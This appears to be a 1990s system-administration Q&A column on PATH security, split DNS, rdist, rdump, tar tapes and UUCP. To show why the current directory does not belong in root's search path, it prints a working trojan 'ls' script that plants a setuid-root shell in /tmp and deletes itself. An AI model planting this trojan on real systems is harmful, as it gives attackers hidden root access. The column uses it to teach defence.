Questions and Answers
Bjorn Satdeva
UniForum in March
UniForum, the oldest and probably the largest exhibition dedicated to UNIX software and hardware, will take place at the Moscone Center in San Francisco, March 21-25. As part of the proceedings, USENIX and SAGE are sponsoring a miniconference on UNIX system administration.
SANS III Conference
The SANS III conference will take place April 4-8, 1994
at the Stouffers
Concourse Hotel in Arlington, Virginia, just across
the Potomac River
from Washington, D.C.
SANS is the acronym for the World Conference on System Administration,
Networking, and Security. It differs from the LISA conferences
in
that it focuses specifically on UNIX system administration
in the
business world.
This year, SANS will offer a forum on useful tools and
management
practices, in addition to providing an opportunity for
administrators
to share ideas and experiences with peers in other parts
of the industry.
A New Local System Administration Group
Yet another local system administration user group has
been formed,
this one in New Jersey. The new group, called $GROUPNAME,
is intended
to facilitate the exchange of information pertaining
to the field
of UNIX system administration. $GROUPNAME is not affiliated
with a
particular hardware or software vendor or company. Membership
is free,
and meetings are usually held on the fourth Thursday of every other month, at different sites around the state. For more
information, send
"get groupname calendar" as the first line
of an email message
(the Subject: will be ignored) to majordomo@warren.mentorg.com.
So far, speakers have discussed Majordomo, perl, and
system security.
Everyone is invited! By the way, the $GROUPNAME people
claim that
rumor has it that UNIX was invented in New Jersey.
And now to this month's questions:
I have been trying to convince other admins here, but
without much success, that for security reasons, the
current directory
should not be first in the search path. What is your
opinion?
The current directory should not be anywhere in
the search path of a user who has root privileges (or
could obtain
them). The reason is that it is very easy to create
a trojan horse
and thereby trick the user into unknowingly breaching the system's security.
To convince yourself and your peer admins, create an
executable file
named ls in your home directory with the following content:
#! /bin/sh
echo intruder alert
Now, when a user who has the current directory first
in the search path executes an ls in that directory,
the message
"intruder alert" will diplay. While the above
is rather harmless,
a trojan horse like the following is definitively not:
#! /bin/sh
# If run by root, plant a setuid-root shell and remove the evidence
if [ `whoami` = 'root' ] ; then
    rm $0    # delete the trojan itself so it is not found afterwards
    (cp /bin/sh /tmp/sh; chown root /tmp/sh; chmod 4555 /tmp/sh)&
fi
/bin/ls ${1+"$@"}    # run the real ls so nothing looks amiss
This code not only creates a super-user backdoor, but
also cleans up after itself, leaving most users unaware
that they
have been caught in a place where they should not be
(the only indication
is that it takes a bit longer than the real ls command
to
execute). While most commercial versions of /bin/sh
have been protected
against this particular tactic, the exercise should
show the problem
clearly. In addition, at least some of the freely distributable versions of sh, csh, and ksh are not protected against it.
I began by stating that any user who has or can obtain
super-user
privileges should not have the current directory in
his/her search
path at all. If you wonder why, consider how many times
you have made
a typo, such as "sl" when you wanted to type
"ls".
The trojan horse above can also be effective if its name is a common mistyping of a command name, such as sl (ls), tra (tar), mkae (make), etc.
The rule of not having the current directory first in the
search path
should be applied to any user who has an account on
your system
(a non-privileged user can get away with having current
directory
last, at least most of the time). On a secure system,
the current
directory should not be in any user's search path at
any time. If
you customarily prefix the name of a program in the current directory
with "./"
(dot-slash), you gain the advantage of explicitly controlling
whether
a file is executed in the local directory or via the
$PATH
environment variable.
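For example, a safe setting in a user's .profile might look like the following sketch (the directories shown are only typical examples):

# No current directory -- neither "." nor an empty entry -- in the path
PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin
export PATH

A program in the current directory is then always run explicitly, as in ./myprog, and never picked up by accident through the search path.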
In addition to the above, many a novice user has innocently created a small test program in the home directory and named it "test" -- only to find that many shell scripts no longer worked, because the scripts now executed the user's program instead of the standard test command.
How do I set up the name server on my firewall to give
only minimal information about hosts on my site to the
Internet, while
still being able to connect to all my internal hosts?
I know this
can be done, but I have not been able to figure out
how.
This is really very, very simple! You do not need any
special version of the name server -- you just need
to take advantage
of the existing functionality to create a split name
server. But before
I show you how to do this, let me first explain why
a split name server
can be desirable.
The foremost reason is security, on the grounds that
information about
the internal networks should not be made public unless
absolutely
necessary. The second reason is that if your firewall
is designed
so that the inside hosts are not accessible at all from
the outside,
then there is no reason to advertise their names to
the rest of the
world. In practice, if your firewall is based on filtering
routers,
then the split name server probably will not buy you anything.
However,
if you have a bastion host configured with either David Koblas' SOCKS or Marcus Ranum's Firewall Toolkit, the split name
server makes good
sense.
The split name server consists of (at least) two name
servers. The
external name server lives on the firewall bastion host,
which has
the "public" information (typically only information
about
your firewall machine and a few MX records). The internal
name server,
on the other hand, has information about all the internal
hosts, including
MX records for e-mail delivery and perhaps HINFO and
TXT records
with other relevant information.
In order to make the two name servers play together,
you will need
to configure the resolver on the firewall machine (typically
in either
/etc/resolv.conf or /usr/lib/resolv.conf) to point
to the internal name server and have the internal name
server forward
all inquiries it cannot resolve itself to the name server
on the firewall
machine. You do this through a "forwarders"
statement in the
name server boot file (typically /etc/named.boot). Figure 1
presents a sample boot file for internal name servers.
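As a rough sketch of the idea (the domain name, file names, and the addresses 10.1.1.1 for the firewall and 10.1.1.2 for the internal name server are invented for illustration), the two files might look like this:

# /etc/resolv.conf on the firewall machine: point the resolver
# at the internal name server
domain example.com
nameserver 10.1.1.2

; /etc/named.boot on an internal name server (BIND 4 syntax)
directory /etc
primary example.com db.example
; forward anything we cannot answer ourselves to the name server
; on the firewall machine
forwarders 10.1.1.1
; rely exclusively on the forwarders, never contact the outside
slave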
With this setup, your internal name servers will probably
not be able
to reach any machine outside your local network (this
depends on the
design of your firewall). Instead, they will forward
any inquiry they
receive to the name server on the firewall machine,
which in turn
will obtain the information from the Internet and return
it to the
internal name server. All inquiries from the outside
will be received
by the external name server, which itself contains the
limited information
you decided to make public and therefore cannot be used
to discover
the configuration of your inside network. On the firewall
itself,
any inquiry originating on this machine will be resolved through the internal name server listed in the resolv.conf file, not through the local (external) name server. Processes running on the firewall machine,
such as sendmail,
will therefore be able to learn how to contact machines
on your inside
network.
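A quick way to verify the behavior is to query from both sides (the hostnames are invented): an inside name should resolve on the firewall, while a query against the external server should return only the public data:

# On the firewall: answered through the internal name server
nslookup fileserver.example.com

# From an outside host, querying the external server directly:
# only the public information should come back
nslookup fileserver.example.com firewall.example.com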
Several RFCs can provide more information on how to
configure a name
server:
RFC 1032 -- Domain Administrators Guide
RFC 1033 -- Domain Administrators Operations Guide
RFC 1034 -- Domain Names -- Concepts and Facilities
RFC 974 -- Mail Routing and the Domain System
There is also an excellent book on the name server,
Cricket
Liu and Paul Albitz's DNS and BIND from O'Reilly and
Associates
(1992). The book describes in detail many of the methods
and techniques
used under DNS and BIND (although the split name server
described
here is not included).
We use rdist to distribute files between our
systems. However, as the number of files and systems
has grown, it
has become increasingly difficult to keep the rdist.cmd
file
up-to-date in an orderly manner. Do you have any suggestions
for organizing
this?
I sympathize with you. rdist is a very handy
tool, but it is not really scalable to a large site.
Because of the
format of the rdist command file, its complexity can
be measured
as the number of files distributed multiplied by the
number of hosts
receiving files (files * hosts). When you have a low
number
of hosts and files, the complexity is low, and the command
file can
be maintained easily. As the number of files and hosts
increases,
you will see a rapid, multiplicative growth in the complexity
of the rdist
file. Another standard UNIX tool, m4, can help for a
while,
but even with that the system can be difficult to maintain
if you
have a large number of different hardware platforms
or operating system
versions.
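As a sketch of the problem (host and file names invented), even a minimal rdist command file pairs every file list with every host list, and each new platform soon needs its own copy of the variables and rules:

HOSTS = ( ws1 ws2 ws3 )
FILES = ( /usr/local/bin /etc/aliases /etc/motd )

${FILES} -> ${HOSTS}
        install ;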
I have resolved this problem at several client sites
by writing a
tool named fdist, a frontend to rdist, which addresses
the main problem. fdist splits the file distribution
from
the receiving hosts by using domains similar to e-mail
addresses on
the Internet. The domains used by fdist of course have
nothing
to do with the Internet domains. Instead, they are used
to determine
the various administrative domains within a site. Because
fdist
uses a relatively simple command-line interface, and
because it separates
concerns about files from concerns about hosts, it allows
distribution
information to be handled by less experienced staff
members. A nice
side effect is that configuring new hosts becomes almost
a non-issue.
fdist is described in the LISA V proceedings ("Fdist:
A
Domain-Based File Distribution System for a Heterogeneous
Environment")
and SANS II proceedings ("A Tour of Fdist: A Domain-Based
File Distribution
System for a Heterogeneous Environment"). Both
of these papers
are also available by anonymous ftp from ftp.sysadmin.com,
together with the perl sources for fdist.
Is it possible to use rdump for a remote backup
without enabling root access between the local and the
remote system?
On most current versions of UNIX, the device files
for
disks and tape drives are owned by a user other than
root (typically
a user named "operator," with UID 5). If you
set this user
up on the tape host so that it will accept connections
from the hosts
you want to back-up, you can achieve what you want by
performing all
backups as user operator. It is important that you make
sure that
the environment is correct, especially that the search
path is correct.
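As a sketch of the two pieces (the host names, device name, and dump flags are examples and vary from system to system):

# ~operator/.rhosts on the tape host: accept user operator
# from each client to be backed up
client1 operator
client2 operator

# On a client, as user operator: level 0 dump of /usr to the
# tape drive on the tape host
rdump 0uf tapehost:/dev/nrst8 /usr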
A simple way to check the access permission is to type
the command
rsh <remotehost> echo hallo
If you get the response "hallo," you can connect
over the network. To verify that the environment is
correct, type
rsh <remotehost> env
which should return the environment. If you get an error
message from rdump, along the lines of "Protocol
to remote
tape server botched (code rmt: Command not found. ?)," your remote search path is not correct.
We have a number of unlabeled tar tapes. Is there
any way we can determine when the tapes were written?
Not directly. However, if you make a verbose listing
of the content, you can determine the date of the newest
file on the
tape. I hacked up a small shell script (shown in Listing
1), which
sorts the table of contents in the order of last modification
time
of each file. If you do something like
tar -tvf /dev/tape | ./script | tail
you will have a good approximation of when the tape
was
made. This script is a good example of how simple tools
can easily
be hacked together using either the shell or a programming
language
such as perl.
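As a rough sketch of such a script (assuming a tar whose verbose listing prints the date and time as yyyy-mm-dd hh:mm in the fourth and fifth columns, as GNU tar does; other tar implementations print dates differently and need other sort keys):

#! /bin/sh
# Sort a tar verbose listing by modification time: the date and
# time columns (fields 4 and 5) sort correctly as plain text
exec sort -k 4,5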
I attended LISA VII, and was disturbed by one of the
papers, which described a site where the users have
root and the admins
do not. What is your opinion of this approach?
The paper in question is Laura de Leon's "Our Users Have Root," and it is noteworthy because it describes
an alternative
system administration environment, where users have
the root password
for their workstations, but the system administrators
do not. The
setting for this is a research environment, where it
seems to work
very well.
I agree with you that it is a bit worrisome to think
of such an environment,
and this was definitely one of the more controversial
papers from
the conference. On the other hand, because it works
in that particular
environment, I think it is worthwhile to look into how
Laura organized
this site. There is a lot to be said for giving users
the freedom
to configure their own environment, and while this paper
may have
gone a bit too far for most sites, it nonetheless presented
some basic
approaches which I think can be adapted to other sites.
This is a
definite must-read for the service-minded system administrator.
My system connects to several other systems using UUCP.
What should my USERFILE look like?
The syntax of the USERFILE is clear, but the semantics
are not. The only content of the USERFILE I can recommend
is
, /usr/spool/uucppublic
, /usr/spool/uucppublic
This will permit both incoming and outgoing traffic
to
access /usr/spool/uucppublic, independent of where
the traffic
originates. This configuration of USERFILE means your
local
users will need to copy files to that directory before
they can UUCP
them to a remote site, but it also ensures that nobody
from a remote
site can access files not already in uucppublic.
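With this USERFILE, a local user would, for example, stage a file and queue the transfer like this (the site and file names are invented):

# stage the file in the public directory, then queue it for
# the remote site ("~" is the remote uucppublic directory)
cp report.txt /usr/spool/uucppublic/report.txt
uucp /usr/spool/uucppublic/report.txt othersite!~/report.txt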
I know your manual shows how you can get a more fine-grained
control,
but because the semantics are so unclear and vary from
one implementation
to another, this approach is the only way to make sure
you have a
secure environment. Luckily, the more modern HoneyDanBer UUCP has a completely different, and much clearer, permissions mechanism. Unfortunately, at least one of the new re-implementations of UUCP mimics the old Version 7 UUCP with its USERFILE.
About the Author
Bjorn Satdeva is the president of /sys/admin, inc.,
a consulting
firm which specializes in large installation system
administration.
Bjorn is also president and co-founder of Bay-LISA,
a San Francisco
Bay Area users' group for system administrators of large
sites. Bjorn
can be contacted at /sys/admin, inc., 2787 Moorpark
Ave., San Jose,
CA 95128; electronically at bjorn@sysadmin.com; or by
phone
at (408) 241-3111.